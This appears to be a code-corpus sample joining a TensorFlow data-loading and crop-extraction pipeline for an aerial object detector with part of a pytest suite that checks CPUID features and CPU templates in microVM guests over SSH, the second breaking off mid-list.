"""
if image_format == 'vedai': # VEDAI
filename = image_folder + '/' + tf.as_string(im_id, fill='0', width=8) + '_co.png'
img_type = 'png'
elif image_format == 'sdd': # STANFORD DRONE DATASET
filename = image_folder + '/' + tf.as_string(im_id, fill='0', width=8) + '.jpeg'
img_type = 'jpg'
else:
raise NotImplementedError("Unrecognized image format `%s`" % image_format)
# Parse image
image = tf.read_file(filename)
if img_type == 'jpg':
image = tf.image.decode_jpeg(image, channels=3)
elif img_type == 'png':
image = tf.image.decode_png(image, channels=3)
else:
raise NotImplementedError('unknown image type %s' % img_type)
image = tf.image.convert_image_dtype(image, tf.float32)
# Resize image
image = tf.image.resize_images(image, (image_size, image_size))
return image
def parse_basic_feature(parsed_features, image_folder, image_format, image_size=448):
""""Parse TFRecords features.
Args:
parsed_features: Parsed TFRecords features.
num_classes: Number of classes in the dataset. Used to infer the dataset.
image_folder: Image directory.
image_format: Used to resolve the correct image path and format.
image_size: Resize to the given image size. Defaults to 448.
Returns:
image_id, an integer (exact format depends on the dataset)
image, Tensor with values in [0, 1], shape (image_size, image_size, 3)
num_boxes, Number of valid boxes for this image
bounding_boxes, Bounding boxes for this image, shape (max_num_bbs, 4)
"""
im_id = tf.cast(parsed_features['im_id'], tf.int32)
image = load_image(im_id, image_size, image_folder, image_format)
num_boxes = tf.cast(parsed_features['num_boxes'], tf.int32)
bounding_boxes = parsed_features["bounding_boxes"]
return {'im_id': im_id,
'image': image,
'num_boxes': num_boxes,
'bounding_boxes': bounding_boxes}
def apply_data_augmentation(in_, data_augmentation_threshold):
""" Perform data augmentation (left/right flip).
Args:
in_: A batch from the dataset (output of iterator.get_next())
data_augmentation_threshold: threshold in [0, 1]
Returns:
Dataset with left/right data augmentation applied
"""
condition_shape = tf.shape(in_['image'])[:1]
condition = (tf.random_uniform(condition_shape) >= data_augmentation_threshold)
# Flip image
in_['image'] = tf.where(condition, in_['image'], tf.reverse(in_['image'], [2]))
# Set is_flipped flag
in_['is_flipped'] = tf.where(condition, in_['is_flipped'], 1. - in_['is_flipped'])
# Flip bounding boxes coordinates, (batch, num_bbs, 4)
in_['bounding_boxes'] = tf.where(condition, in_['bounding_boxes'],
tf.abs([1., 0., 1., 0.] - tf.gather(in_['bounding_boxes'], [2, 1, 0, 3], axis=-1)))
# Flip active/empty cell mask, (batch, num_cells_x, num_cells_y, 1, num_bbs)
in_['obj_i_mask_bbs'] = tf.where(condition, in_['obj_i_mask_bbs'], tf.reverse(in_['obj_i_mask_bbs'], [2]))
# Flip groups bounding boxes coordinates, (batch, num_cells, num_cells, 1, 4)
if 'group_bounding_boxes_per_cell' in in_:
in_['group_bounding_boxes_per_cell'] = tf.where(
condition, in_['group_bounding_boxes_per_cell'], tf.abs([1., 0., 1., 0.] - tf.gather(
tf.reverse(in_['group_bounding_boxes_per_cell'], [2]), [2, 1, 0, 3], axis=-1)))
# Flip groups ground-truth flags, (batch, num_cells, num_cells, 1, 1)
if 'group_flags' in in_:
in_['group_flags'] = tf.where(condition, in_['group_flags'], tf.reverse(in_['group_flags'], [2]))
# Flip groups classes, (batch, num_cells, num_cells, 1, num_classes)
if 'group_class_labels' in in_:
in_['group_class_labels'] = tf.where(condition, in_['group_class_labels'],
tf.reverse(in_['group_class_labels'], [2]))
# Return
return in_
def get_tf_dataset(tfrecords_file,
record_keys,
image_format,
max_num_bbs,
with_groups=True,
grouping_method='intersect',
grid_offsets=None,
with_classes=False,
num_classes=None,
batch_size=1,
drop_remainder=False,
num_epochs=1,
image_size=1024,
image_folder='',
data_augmentation_threshold=0.5,
num_devices=1,
num_threads=4,
shuffle_buffer=1,
prefetch_capacity=1,
make_initializable_iterator=False,
verbose=1):
"""Parse and load inputs from the given TFRecords as a tf.data.Dataset.
Args:
tfrecords_file: Path to the TFRecords file containing the data.
record_keys: Feature keys present in the TFrecords. Loaded from the metadata file
max_num_bbs: Maximum number of bounding boxes in the dataset. Used for reshaping the `bounding_boxes` records.
num_classes: Number of classes in the dataset. Only used if with_classes is True
with_classes: wheter to use class information
with_groups: whether to pre-compute grouped instances ground-truth
grid_offsets: Precomputed grid offsets
batch_size: Batch size.
num_epochs: Number of epochs to repeat.
image_size: The square size which to resize images to.
image_folder: path to the directory containing the images in the dataset.
data_augmentation_threshold: Data augmentation probabilitiy (in [0, 1])
num_devices: Number of devices
num_threads: Number of readers for the batch queue.
shuffle_buffer: Size of the shuffling buffer.
prefetch_capacity: Buffer size for prefetching.
make_initializable_iterator: if True, make an initializable and add its initializer to the collection `iterator_init`
verbose: Verbosity level
Returns:
A tf.Data.dataset iterator (and its initializer if initializable_iterator)
"""
assert grouping_method in ['intersect', 'intersect_with_density', 'unique_intersect']
assert not (with_classes and num_classes is None)
assert len(record_keys)
assert batch_size > 0
assert image_size > 0
assert 0. <= data_augmentation_threshold <= 1.
if grid_offsets is not None:
num_cells = grid_offsets.shape[:2]
assert num_devices > 0
assert num_threads > 0
assert shuffle_buffer > 0
if verbose == 2:
print(' \033[31m> load_inputs\033[0m')
elif verbose == 1:
print(' > load_inputs')
# Normalize grid cells offsets
if grid_offsets is not None:
grid_offsets_mins = grid_offsets / num_cells
grid_offsets_maxs = (grid_offsets + 1.) / num_cells
# Create TFRecords feature
features = read_tfrecords(record_keys, max_num_bbs=max_num_bbs)
def parsing_function(example_proto):
# Basic features
parsed_features = tf.parse_single_example(example_proto, features)
output = parse_basic_feature(parsed_features, image_folder, image_format, image_size=image_size)
bounding_boxes = output['bounding_boxes']
# Empty/active cells mask
# obj_i_mask_bbs: (num_cells, num_cells, 1, num_bbs)
mins, maxs = tf.split(bounding_boxes, 2, axis=-1) # (num_bbs, 2)
inters = tf.maximum(0., tf.minimum(maxs, grid_offsets_maxs) - tf.maximum(mins, grid_offsets_mins))
inters = tf.reduce_prod(inters, axis=-1)
obj_i_mask = tf.expand_dims(tf.to_float(inters > 0.) , axis=-2)
output["obj_i_mask_bbs"] = obj_i_mask
# Grouped instances
# group_bounding_boxes_per_cell: (num_cells, num_cells, 1, 4), cell bounding box after grouping
# group_flags: (num_cells, num_cells, 1, 1), whether a cell contains a group or not
# num_group_boxes: (), number of bounding boxes after grouping
if with_groups:
## Define group_mask: (num_cells, num_cells, num_bbs, 1)
## Maps each gt bounding box to a grid cell to be merged into a group
if grouping_method == 'intersect_with_density':
obj_i_mask = tf.expand_dims(tf.to_float(inters > 0.) , axis=-2)
obj_i_mask *= tf.expand_dims(tf.to_float(inters < 1. / (num_cells[0] * num_cells[1])) , axis=-2)
group_mask = tf.transpose(obj_i_mask, (0, 1, 3, 2)) # (num_cells, num_cells, num_bbs, 1)
elif grouping_method == 'unique_intersect':
# weight 1: Intersection between gt boxes and cells
# Upper bounded by 1
# (num_cells, num_cells, num_bbs)
w1 = inters * num_cells[0] * num_cells[1]
# weight 2: Opposite of How many objects coocurs in each cells
# Upper bounded by 1
# (num_cells, num_cells, 1)
w2 = 1. - tf.reduce_sum(obj_i_mask, axis=-1) / tf.to_float(output['num_boxes'])
# Assign each ground-truth to one unique group
group_mask = w1 * w2
group_mask = tf.to_float(group_mask > 0.) * tf.to_float(group_mask >= tf.reduce_max(group_mask, axis=(0, 1), keep_dims=True))
group_mask = tf.expand_dims(group_mask, axis=-1)
elif grouping_method == 'intersect':
group_mask = tf.transpose(obj_i_mask, (0, 1, 3, 2)) # (num_cells, num_cells, num_bbs, 1)
## Merge bbs coocurring in the same cell to form groups
mins = mins + 1. - group_mask
mins = tf.reduce_min(mins, axis=2, keep_dims=True) # (num_cells, num_cells, 1, 2)
maxs = maxs * group_mask
maxs = tf.reduce_max(maxs, axis=2, keep_dims=True)
group_bounding_boxes_per_cell = tf.concat([mins, maxs], axis=-1)
group_bounding_boxes_per_cell = tf.clip_by_value(group_bounding_boxes_per_cell, 0., 1.)
output["group_bounding_boxes_per_cell"] = group_bounding_boxes_per_cell
num_bbs_per_cell = tf.reduce_sum(group_mask, axis=2, keep_dims=True)
num_group_boxes = tf.reduce_sum(tf.to_int32(num_bbs_per_cell > 0))
output["num_group_boxes"] = num_group_boxes
group_flags = tf.maximum(tf.minimum(num_bbs_per_cell, 2.) - 1., 0.)
output["group_flags"] = group_flags
# is_flipped flag: (), indicates whether the image has been flipped during data augmentation
output["is_flipped"] = tf.constant(0.)
# Optional : add classes
if with_classes:
class_labels = tf.one_hot(parsed_features['classes'], num_classes,
axis=-1, on_value=1, off_value=0, dtype=tf.int32)
output['class_labels'] = class_labels
# Group classes (majority vote) # (num_cells, num_cells, 1, num_classes)
if with_groups:
percell_class_labels = tf.expand_dims(tf.expand_dims(class_labels, axis=0), axis=0)
percell_class_labels = group_mask * tf.to_float(percell_class_labels)
percell_class_labels = tf.reduce_sum(percell_class_labels, axis=2, keep_dims=True)
group_class_labels = tf.argmax(percell_class_labels, axis=-1)
group_class_labels = tf.one_hot(group_class_labels, num_classes,
axis=-1, on_value=1, off_value=0, dtype=tf.int32)
group_class_labels = tf.to_int32(percell_class_labels * tf.to_float(group_class_labels))
output["group_class_labels"] = group_class_labels
return output
## Create the dataset
with tf.name_scope('load_dataset'):
# Parse data
dataset = tf.data.TFRecordDataset(tfrecords_file)
# Map
dataset = dataset.shuffle(buffer_size=shuffle_buffer)
dataset = dataset.map(parsing_function, num_parallel_calls=num_threads)
# Repeat
if num_epochs > 1:
dataset = dataset.repeat(num_epochs)
# Batch
if tf.__version__ == '1.4.0':
dataset = dataset.batch(batch_size * num_devices)
else:
dataset = dataset.batch(batch_size * num_devices, drop_remainder=drop_remainder)
# Prefetch
if prefetch_capacity > 0:
dataset = dataset.prefetch(prefetch_capacity)
# Iterator
if make_initializable_iterator:
iterator = dataset.make_initializable_iterator()
iterator_init = iterator.initializer
tf.add_to_collection('iterator_init', iterator_init)
else:
iterator = dataset.make_one_shot_iterator()
iterator_init = None
batch = iterator.get_next()
## Apply data augmentation
with tf.name_scope('data_augmentation'):
if data_augmentation_threshold > 0.:
batch = apply_data_augmentation(batch, data_augmentation_threshold)
## Split across device
slice_dims = [0] * num_devices
unpadded_batch = tf.to_int32(tf.shape(batch['im_id'])[0])
for i in range(num_devices):
slice_dims[i] = tf.maximum(0, tf.minimum(batch_size, unpadded_batch))
unpadded_batch -= batch_size
inputs = [{} for _ in range(num_devices)]
for key, value in batch.items():
for i, split_value in enumerate(tf.split(value, slice_dims, axis=0)):
inputs[i][key] = split_value
## Verbose log
if verbose == 2:
print('\n'.join(" \033[32m%s\033[0m: shape=%s, dtype=%s" % (key, value.get_shape().as_list(), value.dtype)
for key, value in inputs[0].items()))
elif verbose == 1:
print('\n'.join(" *%s*: shape=%s, dtype=%s" % (key, value.get_shape().as_list(), value.dtype)
for key, value in inputs[0].items()))
return inputs, iterator_init
def filter_individuals(predicted_boxes, predicted_scores, predicted_group_flags, strong_confidence_threshold=1.0):
"""Filter out individuals predictions with confidence higher than the given threhsold"""
# should_be_refined: (batch, num_boxes, 1) : groups and not strongly confident individuals
if predicted_group_flags is not None:
is_not_strongly_confident = tf.to_float(predicted_scores <= strong_confidence_threshold)
# is_group: (batch, num_boxes, 1)
is_group = tf.to_float(tf.nn.sigmoid(predicted_group_flags) > 0.5)
is_group = utils.flatten_percell_output(is_group)
should_be_refined = tf.minimum(1., is_group + is_not_strongly_confident)
else:
should_be_refined = tf.to_float(predicted_scores <= strong_confidence_threshold)
# Filter them out from potential crops
predicted_scores *= should_be_refined
predicted_boxes *= should_be_refined
# Return filtered boxes and filter
return predicted_boxes, predicted_scores, tf.squeeze(1. - should_be_refined, axis=-1)
def filter_threshold(predicted_boxes, predicted_scores, confidence_threshold=-1.):
"""Filter out boxes with confidence below the given threshold"""
filtered = tf.to_float(predicted_scores > confidence_threshold)
predicted_scores *= filtered
predicted_boxes *= filtered
return predicted_boxes, predicted_scores
def extract_groups(predicted_boxes,
predicted_scores,
predicted_group_flags=None,
predicted_offsets=None,
mode='train',
verbose=False,
epsilon=1e-8,
**kwargs):
""" Extract crops from the outputs of intermediate stage.
Args:
predicted_boxes: A (batch_size, num_cells, num_cells, num_boxes, 4) array
predicted_scores: A (batch_size, num_cells, num_cells, num_boxes, 1) array
predicted_group_flags: A (batch_size, num_cells, num_cells, num_boxes, 1) array
predicted_offsets: A (batch_size, num_cells, num_cells, num_boxes, 2) array
mode: If test, the boxes are only passed to the next stage if they are worth being refined
(ie groups or unprecise individual)
Kwargs:
{train, test}_patch_confidence_threshold: Minimum confidence threshold to qualify for refinement
patch_nms_threshold: NMS threshold
{train, test}_num_crops: Number of crops to extract
test_patch_strong_confidence_threshold: high confidence threshold
previous_batch_size: Batch size of the previous stage (for which `predicted boxes` where output). Needs
to be statistically known for the NMS loop.
#Returns:
Extracted crops and their confidence scores
"""
if mode == 'train': # train time
(confidence_threshold, nms_threshold, num_outputs) = get_defaults(
kwargs, ['train_patch_confidence_threshold', 'train_patch_nms_threshold', 'train_num_crops'], verbose=verbose)
elif mode in ['val', 'test']: # inference
(confidence_threshold, nms_threshold, num_outputs) = get_defaults(
kwargs, ['test_patch_confidence_threshold', 'test_patch_nms_threshold', 'test_num_crops'], verbose=verbose)
else:
raise ValueError('Unknown mode', mode)
if verbose:
print(' extracting %d crops' % num_outputs)
## Flatten
# predicted_score: (batch, num_boxes, 1)
# predicted_boxes: (batch, num_boxes, 4)
with tf.name_scope('flat_output'):
predicted_boxes = utils.flatten_percell_output(predicted_boxes)
predicted_scores = utils.flatten_percell_output(predicted_scores)
## Filter
kept_out_filter = tf.zeros(tf.shape(predicted_scores)) # default
with tf.name_scope('filter_groups'):
# At test time, we keep out individual confidences with high confidence
# we save these `shortcut` boxes in the `kept_out_filter` Tensor
if mode in ['test', 'val']:
strong_confidence_threshold = get_defaults(
kwargs, ['test_patch_strong_confidence_threshold'], verbose=verbose)[0]
if isinstance(strong_confidence_threshold, tf.Tensor) or strong_confidence_threshold < 1.0:
predicted_boxes, predicted_scores, kept_out_filter = filter_individuals(
predicted_boxes, predicted_scores, predicted_group_flags, strong_confidence_threshold)
# Additionally, we filter out boxes with confidence below the threshold
if isinstance(confidence_threshold, tf.Tensor) or confidence_threshold > 0.:
with tf.name_scope('filter_confidence'):
predicted_boxes, predicted_scores = filter_threshold(
predicted_boxes, predicted_scores, confidence_threshold)
## Rescale remaining boxes with the learned offsets
with tf.name_scope('offsets_rescale_boxes'):
if predicted_offsets is not None:
predicted_boxes = utils.rescale_with_offsets(
predicted_boxes, utils.flatten_percell_output(predicted_offsets), epsilon)
## Extract n best patches
# crop_boxes: (batch, num_crops, 4)
# crop_boxes_confidences: (batch, num_crops)
predicted_scores = tf.squeeze(predicted_scores, axis=-1)
if isinstance(num_outputs, tf.Tensor) or num_outputs > 0:
# Non-Maximum Suppression: outputs the top `num_outputs` boxes after NMS
if (isinstance(nms_threshold, tf.Tensor) or nms_threshold < 1.0) or (isinstance(num_outputs, tf.Tensor)):
batch_size = get_defaults(kwargs, ['previous_batch_size'], verbose=verbose)[0]
current_batch = tf.shape(predicted_boxes)[0]
with tf.name_scope('nms'):
nms_boxes = []
nms_boxes_confidences = []
for i in range(batch_size):
boxes, scores = tf.cond(
i < current_batch, # last batch can be smaller
true_fn=lambda: utils.nms_with_pad(predicted_boxes[i, :, :],
predicted_scores[i, :],
num_outputs,
iou_threshold=nms_threshold),
false_fn=lambda: (tf.zeros((num_outputs, 4)), tf.zeros((num_outputs,)))
)
nms_boxes.append(boxes)
nms_boxes_confidences.append(scores)
# Reshape nms boxes output
predicted_boxes = tf.stack(nms_boxes, axis=0)
predicted_boxes = tf.slice(predicted_boxes, (0, 0, 0), (current_batch, -1, -1))
predicted_boxes = tf.reshape(predicted_boxes, (-1, num_outputs, 4))
# Reshape nms scores output
predicted_scores = tf.stack(nms_boxes_confidences, axis=0)
predicted_scores = tf.slice(predicted_scores, (0, 0), (current_batch, -1))
predicted_scores = tf.reshape(predicted_scores, (-1, num_outputs))
# No NMS: Outputs `num_outputs` boxes with the best confidence scores
# num_outputs need to be defined for tf.nn.top_k
else:
predicted_scores, top_indices = tf.nn.top_k(predicted_scores, k=num_outputs)
batch_indices = tf.range(tf.shape(predicted_boxes)[0])
batch_indices = tf.tile(tf.expand_dims(batch_indices, axis=-1), (1, num_outputs))
gather_indices = tf.stack([batch_indices, top_indices], axis=-1)
predicted_boxes = tf.gather_nd(predicted_boxes, gather_indices)
# No filtering
return predicted_boxes, predicted_scores, kept_out_filter
def tile_and_reshape(t, num_crops):
""" Given an initial Tensor `t` of shape (batch_size, s1...sn), tile and reshape it to size
(batch_size * `num_crops`, s1..sn) to be forwarded to the next stage input.
Note that s1...sn should be a *fully defined* shape.
"""
new_shape = t.get_shape().as_list()
new_shape[0] = -1
t = tf.expand_dims(t, axis=1)
tile_pattern = [1] * len(t.get_shape())
tile_pattern[1] = num_crops
tile_pattern = tf.stack(tile_pattern, axis=0)
t = tf.tile(t, tile_pattern)
assert not None in new_shape
t = tf.reshape(t, new_shape)
return t
def get_next_stage_inputs(inputs,
crop_boxes,
batch_size=None,
image_size=256,
previous_batch_size=None,
full_image_size=1024,
image_folder=None,
image_format=None,
grid_offsets=None,
intersection_ratio_threshold=0.25,
epsilon=1e-8,
use_queue=False,
shuffle_buffer=1,
num_threads=1,
capacity=5000,
verbose=False):
"""
Create input queue for the second - and final - stage.
Args:
inputs, a dictionnary of inputs
crop_boxes, a (batch_size, num_crops, 4) tensor of crops
image_folder: Image directory, used for reloading the full resolution images if needed
batch_size: Batch size for the output of this pipeline
image_size: Size of the images patches in the new dataset
full_image_size: Size of the images to load before applying the croppings
grid_offsets: A (num_cells, num_cells) array
use_queue: Whether to use a queue or directly output the new inputs dictionary
shuffle_buffer: shuffle buffer of the output queue
num_threads: number of readers in the output queue
capacity: Output queue capacity
verbose: verbosity
"""
assert 0. <= intersection_ratio_threshold < 1.
num_crops = tf.shape(crop_boxes)[1]
new_inputs = {}
# new_im_id: (batch_size * num_crops,)
if 'im_id' in inputs:
with tf.name_scope('im_ids'):
new_inputs['im_id'] = tile_and_reshape(inputs['im_id'], num_crops)
# classes: (batch_size * num_crops, num_classes)
if 'class_labels' in inputs:
with tf.name_scope('class_labels'):
new_inputs['class_labels'] = tile_and_reshape(inputs['class_labels'], num_crops)
# new_image: (num_patches, image_size, image_size, 3)
with tf.name_scope('extract_image_patches'):
# Extract patches and resize
# crop_boxes_indices: (batch_size * num_crops,)
# crop_boxes_flat: (batch_size * num_crops, 4)
crop_boxes_indices = tf.ones(tf.shape(crop_boxes)[:2], dtype=tf.int32)
crop_boxes_indices = tf.cumsum(crop_boxes_indices, axis=0, exclusive=True)
crop_boxes_indices = tf.reshape(crop_boxes_indices, (-1,))
crop_boxes_flat = tf.gather(tf.reshape(crop_boxes, (-1, 4)), [1, 0, 3, 2], axis=-1)
new_inputs['image'] = tf.image.crop_and_resize(
inputs['image'], crop_boxes_flat, crop_boxes_indices,
(image_size, image_size), name='extract_groups')
# new_bounding_boxes: (num_patches, max_num_bbs, 4)
# rescale bounding boxes coordinates to the cropped image
if 'bounding_boxes' in inputs:
with tf.name_scope('shift_bbs'):
# bounding_boxes: (batch, num_crops, max_num_bbs, 4)
# crop_boxes: (batch, num_crops, 1, 4)
bounding_boxes = inputs['bounding_boxes']
max_num_bbs = bounding_boxes.get_shape()[1].value
bounding_boxes = tf.expand_dims(bounding_boxes, axis=1)
bounding_boxes = tf.tile(bounding_boxes, (1, num_crops, 1, 1))
crop_boxes = tf.expand_dims(crop_boxes, axis=2)
# Filter out cut bbs
ratios = utils.get_intersection_ratio(tf.split(bounding_boxes, 4, axis=-1), tf.split(crop_boxes, 4, axis=-1))
condition = tf.tile(ratios > intersection_ratio_threshold, (1, 1, 1, 4))
bounding_boxes *= tf.to_float(condition)
# Rescale coordinates to the cropped image
crop_mins, crop_maxs = tf.split(crop_boxes, 2, axis=-1)
bounding_boxes -= tf.tile(crop_mins, (1, 1, 1, 2))
bounding_boxes /= tf.maximum(epsilon, tf.tile(crop_maxs - crop_mins, (1, 1, 1, 2)))
bounding_boxes = tf.clip_by_value(bounding_boxes, 0., 1.)
bounding_boxes = tf.reshape(bounding_boxes, (-1, max_num_bbs, 4))
new_inputs['bounding_boxes'] = bounding_boxes
# number of valid boxes: (num_patches,)
if 'num_boxes' in inputs:
with tf.name_scope('num_boxes'):
valid_boxes = ((bounding_boxes[..., 2] > bounding_boxes[..., 0]) &
(bounding_boxes[..., 3] > bounding_boxes[..., 1]))
num_boxes = tf.to_float(valid_boxes)
new_inputs['num_boxes'] = tf.to_int32(tf.reduce_sum(num_boxes, axis=-1) )
# Compute the box presence in cell mask
# obj_i_mask_bbs: (num_patches, num_cells, num_cells, 1, num_gt)
if 'obj_i_mask_bbs' in inputs:
with tf.name_scope('grid_offsets'):
if grid_offsets is not None:
num_cells = grid_offsets.shape[:2]
grid_offsets_mins = grid_offsets / num_cells
grid_offsets_maxs = (grid_offsets + 1.) / num_cells
bounding_boxes = tf.reshape(bounding_boxes, (-1, 1, 1, max_num_bbs, 4))
mins, maxs = tf.split(bounding_boxes, 2, axis=-1)
inters = tf.maximum(0., tf.minimum(maxs, grid_offsets_maxs) - tf.maximum(mins, grid_offsets_mins))
inters = tf.reduce_prod(inters, axis=-1)
obj_i_mask = tf.expand_dims(tf.to_float(inters > 0.) , axis=-2)
new_inputs['obj_i_mask_bbs'] = obj_i_mask
# During training: enqueue the inputs
if use_queue:
assert batch_size is not None
filter_valid = tf.logical_and(crop_boxes[..., 2] > crop_boxes[..., 0], crop_boxes[..., 3] > crop_boxes[..., 1] )
filter_valid = tf.reshape(filter_valid, (-1,))
# TODO maybe_batch is deprecated
out_ = tf.train.maybe_batch(
new_inputs, filter_valid, batch_size, num_threads=num_threads, enqueue_many=True, capacity=capacity)
# During inference: process crops deterministically
else:
out_ = new_inputs
if verbose == 1:
print('\n'.join(" \033[32m%s\033[0m: shape=%s, dtype=%s" % (key, value.get_shape().as_list(), value.dtype)
for key, value in out_.items() if key != 'batch_size'))
elif verbose > 1:
print('\n'.join(" *%s*: shape=%s, dtype=%s" % (key, value.get_shape().as_list(), value.dtype)
for key, value in out_.items() if key != 'batch_size'))
return out_ |
the-stack_106_23832 | # Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
"""Tests for the CPU topology emulation feature."""
import platform
import re
import pytest
import framework.utils_cpuid as utils
import host_tools.network as net_tools
PLATFORM = platform.machine()
def _check_cpuid_x86(test_microvm, expected_cpu_count, expected_htt):
expected_cpu_features = {
"cpu count": '{} ({})'.format(hex(expected_cpu_count),
expected_cpu_count),
"CLFLUSH line size": "0x8 (8)",
"hypervisor guest status": "true",
"hyper-threading / multi-core supported": expected_htt
}
utils.check_guest_cpuid_output(test_microvm, "cpuid -1", None, '=',
expected_cpu_features)
def _check_cpu_features_arm(test_microvm):
expected_cpu_features = {
"Flags": "fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp "
"asimdhp cpuid asimdrdm lrcpc dcpop asimddp ssbs",
}
utils.check_guest_cpuid_output(test_microvm, "lscpu", None, ':',
expected_cpu_features)
@pytest.mark.skipif(
PLATFORM != "x86_64",
reason="CPUID is only supported on x86_64."
)
@pytest.mark.parametrize(
"num_vcpus",
[1, 2, 16],
)
@pytest.mark.parametrize(
"htt",
[True, False],
)
def test_cpuid(test_microvm_with_ssh, network_config, num_vcpus, htt):
"""
Check the CPUID for a microvm with the specified config.
@type: functional
"""
vm = test_microvm_with_ssh
vm.spawn()
vm.basic_config(vcpu_count=num_vcpus, ht_enabled=htt)
_tap, _, _ = vm.ssh_network_config(network_config, '1')
vm.start()
_check_cpuid_x86(vm, num_vcpus, "true" if num_vcpus > 1 else "false")
@pytest.mark.skipif(
PLATFORM != "aarch64",
reason="The CPU features on x86 are tested as part of the CPU templates."
)
def test_cpu_features(test_microvm_with_ssh, network_config):
"""
Check the CPU features for a microvm with the specified config.
@type: functional
"""
vm = test_microvm_with_ssh
vm.spawn()
vm.basic_config()
_tap, _, _ = vm.ssh_network_config(network_config, '1')
vm.start()
_check_cpu_features_arm(vm)
@pytest.mark.skipif(
PLATFORM != "x86_64",
reason="The CPU brand string is masked only on x86_64."
)
def test_brand_string(test_microvm_with_ssh, network_config):
"""
Ensure good formatting for the guest brand string.
* For Intel CPUs, the guest brand string should be:
Intel(R) Xeon(R) Processor @ {host frequency}
where {host frequency} is the frequency reported by the host CPUID
(e.g. 4.01GHz)
* For AMD CPUs, the guest brand string should be:
AMD EPYC
* For other CPUs, the guest brand string should be:
""
@type: functional
"""
cif = open('/proc/cpuinfo', 'r')
host_brand_string = None
while True:
line = cif.readline()
if line == '':
break
mo = re.search("^model name\\s+:\\s+(.+)$", line)
if mo:
host_brand_string = mo.group(1)
cif.close()
assert host_brand_string is not None
test_microvm = test_microvm_with_ssh
test_microvm.spawn()
test_microvm.basic_config(vcpu_count=1)
_tap, _, _ = test_microvm.ssh_network_config(network_config, '1')
test_microvm.start()
ssh_connection = net_tools.SSHConnection(test_microvm.ssh_config)
guest_cmd = "cat /proc/cpuinfo | grep 'model name' | head -1"
_, stdout, stderr = ssh_connection.execute_command(guest_cmd)
assert stderr.read() == ''
line = stdout.readline().rstrip()
mo = re.search("^model name\\s+:\\s+(.+)$", line)
assert mo
guest_brand_string = mo.group(1)
assert guest_brand_string
cpu_vendor = utils.get_cpu_vendor()
expected_guest_brand_string = ""
if cpu_vendor == utils.CpuVendor.AMD:
expected_guest_brand_string += "AMD EPYC"
elif cpu_vendor == utils.CpuVendor.INTEL:
expected_guest_brand_string = "Intel(R) Xeon(R) Processor"
mo = re.search("[.0-9]+[MG]Hz", host_brand_string)
if mo:
expected_guest_brand_string += " @ " + mo.group(0)
assert guest_brand_string == expected_guest_brand_string
@pytest.mark.skipif(
PLATFORM != "x86_64",
reason="CPU features are masked only on x86_64."
)
@pytest.mark.parametrize("cpu_template", ["T2", "C3"])
def test_cpu_template(test_microvm_with_ssh, network_config, cpu_template):
"""
Test masked and enabled cpu features against the expected template.
This test checks that all expected masked features are not present in the
guest and that expected enabled features are present for each of the
supported CPU templates.
@type: functional
"""
test_microvm = test_microvm_with_ssh
test_microvm.spawn()
test_microvm.basic_config(vcpu_count=1)
# Set template as specified in the `cpu_template` parameter.
response = test_microvm.machine_cfg.put(
vcpu_count=1,
mem_size_mib=256,
ht_enabled=False,
cpu_template=cpu_template,
)
assert test_microvm.api_session.is_status_no_content(response.status_code)
_tap, _, _ = test_microvm.ssh_network_config(network_config, '1')
response = test_microvm.actions.put(action_type='InstanceStart')
if utils.get_cpu_vendor() != utils.CpuVendor.INTEL:
# We shouldn't be able to apply Intel templates on AMD hosts
assert test_microvm.api_session.is_status_bad_request(
response.status_code)
return
assert test_microvm.api_session.is_status_no_content(
response.status_code)
check_masked_features(test_microvm, cpu_template)
check_enabled_features(test_microvm, cpu_template)
def check_masked_features(test_microvm, cpu_template):
"""Verify the masked features of the given template."""
common_masked_features_lscpu = ["dtes64", "monitor", "ds_cpl", "tm2",
"cnxt-id", "sdbg", "xtpr", "pdcm",
"osxsave",
"psn", "ds", "acpi", "tm", "ss", "pbe",
"fpdp", "rdt_m", "rdt_a", "mpx", "avx512f",
"intel_pt",
"avx512_vpopcntdq",
"3dnowprefetch", "pdpe1gb"]
common_masked_features_cpuid = {"SGX": "false", "HLE": "false",
"RTM": "false", "RDSEED": "false",
"ADX": "false", "AVX512IFMA": "false",
"CLFLUSHOPT": "false", "CLWB": "false",
"AVX512PF": "false", "AVX512ER": "false",
"AVX512CD": "false", "SHA": "false",
"AVX512BW": "false", "AVX512VL": "false",
"AVX512VBMI": "false", "PKU": "false",
"OSPKE": "false", "RDPID": "false",
"SGX_LC": "false",
"AVX512_4VNNIW": "false",
"AVX512_4FMAPS": "false",
"XSAVEC": "false", "XGETBV": "false",
"XSAVES": "false"}
# These are all discoverable by cpuid -1.
c3_masked_features = {"FMA": "false", "MOVBE": "false", "BMI": "false",
"AVX2": "false", "BMI2": "false", "INVPCID": "false"}
# Check that all common features discoverable with lscpu
# are properly masked.
ssh_connection = net_tools.SSHConnection(test_microvm.ssh_config)
guest_cmd = "cat /proc/cpuinfo | grep 'flags' | head -1"
_, stdout, stderr = ssh_connection.execute_command(guest_cmd)
assert stderr.read() == ''
cpu_flags_output = stdout.readline().rstrip().split(' ')
for feature in common_masked_features_lscpu:
assert feature not in cpu_flags_output, feature
# Check that all common features discoverable with cpuid
# are properly masked.
utils.check_guest_cpuid_output(test_microvm, "cpuid -1", None, '=',
common_masked_features_cpuid)
if cpu_template == "C3":
utils.check_guest_cpuid_output(test_microvm, "cpuid -1", None, '=',
c3_masked_features)
# Check if XSAVE PKRU is masked for T3/C2.
expected_cpu_features = {
"XCR0 supported: PKRU state": "false"
}
utils.check_guest_cpuid_output(test_microvm, "cpuid -1", None, '=',
expected_cpu_features)
def check_enabled_features(test_microvm, cpu_template):
"""Test for checking that all expected features are enabled in guest."""
enabled_list = { # feature_info_1_edx
"x87 FPU on chip": "true", "CMPXCHG8B inst": "true",
"virtual-8086 mode enhancement": "true",
"SSE extensions": "true", "SSE2 extensions": "true",
"debugging extensions": "true",
"page size extensions": "true",
"time stamp counter": "true",
"RDMSR and WRMSR support": "true",
"physical address extensions": "true",
"machine check exception": "true",
"APIC on chip": "true", "MMX Technology": "true",
"SYSENTER and SYSEXIT": "true",
"memory type range registers": "true",
"PTE global bit": "true", "FXSAVE/FXRSTOR": "true",
"machine check architecture": "true",
"conditional move/compare instruction": "true",
"page attribute table": "true",
"page size extension": "true",
"CLFLUSH instruction": "true",
# feature_info_1_ecx
"PNI/SSE3: Prescott New Instructions": "true",
"PCLMULDQ instruction": "true",
"SSSE3 extensions": "true",
"AES instruction": "true",
"CMPXCHG16B instruction": "true",
"process context identifiers": "true",
